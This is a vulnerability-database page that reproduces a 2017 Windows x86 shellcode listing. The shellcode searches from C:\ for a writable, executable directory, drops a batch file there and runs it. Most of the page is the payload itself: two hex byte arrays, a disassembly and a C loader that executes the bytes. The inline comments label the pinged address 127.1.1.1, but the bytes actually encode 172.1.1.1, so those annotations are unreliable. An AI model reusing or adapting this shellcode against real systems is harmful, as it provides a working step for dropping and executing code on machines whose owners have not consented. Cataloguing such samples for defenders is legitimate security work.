Vulners
Lucene search
Windows x86 - Executable Directory Search Shellcode (130 bytes)
# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes
/*
Description:
write & exec dir searcher
starts from C:\
If dir found then write, execute (ping 127.1.1.1) and exit
If Write/noexec dir found then continue
Tested on WinXP SP1 (77e6fd35;77e798fd)
i686-w64-mingw32-gcc shell.c -o golddgger.exe
Null-free version:
(gdb) disassemble
Dump of assembler code for function function:
=> 0x08048062 <+0>: pop ecx
0x08048063 <+1>: xor eax,eax
0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al
0x08048068 <+6>: push eax
0x08048069 <+7>: push ecx
0x0804806a <+8>: mov eax,0x77e6fd35
0x0804806f <+13>: call eax
0x08048071 <+15>: xor eax,eax
0x08048073 <+17>: push eax
0x08048074 <+18>: mov eax,0x77e798fd
0x08048079 <+23>: call eax
NULL-free shellcode (132 bytes):
"\xeb\x19\x59\x31\xc0\x88\x41\x64"
"\x50\x51\xb8"
"\x35\xfd\xe6\x77" // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77" // exit
"\xff\xd0\xe8\xe2\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20"
"\x2f\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c" // C:\
"\x20\x26\x46\x4f\x52"
"\x20\x2f\x44\x20\x2f\x72\x20\x25"
"\x41\x20\x49\x4e\x20\x28\x2a\x29"
"\x20\x44\x4f\x20"
"\x65\x63\x68\x6f\x20"
"\x70\x69\x6e\x67\x20"
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
"\x61\x74\x22\x26\x28\x63\x61\x6c"
"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
"\x62\x61\x74\x22\x26\x26\x65\x78"
"\x69\x74\x29\x29\x22";
*/
// NULL version (130 bytes):
char code[] =
"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
"\x35\xfd\xe6\x77" // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77" // exit
"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c" // C:\
"\x20\x26\x46\x4f\x52\x20\x2f\x44"
"\x20\x2f\x72\x20\x25\x41\x20\x49"
"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
"\x20\x65\x63\x68\x6f\x20\x70\x69"
"\x6e\x67\x20"
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
"\x3e\x22\x25\x41"
"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
"\x28\x63\x61\x6c\x6c\x20\x22\x25"
"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
"\x26\x26\x65\x78\x69\x74\x29\x29"
"\x22\x00";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Feb 2017 00:00Current
7.4High risk
Vulners AI Score7.4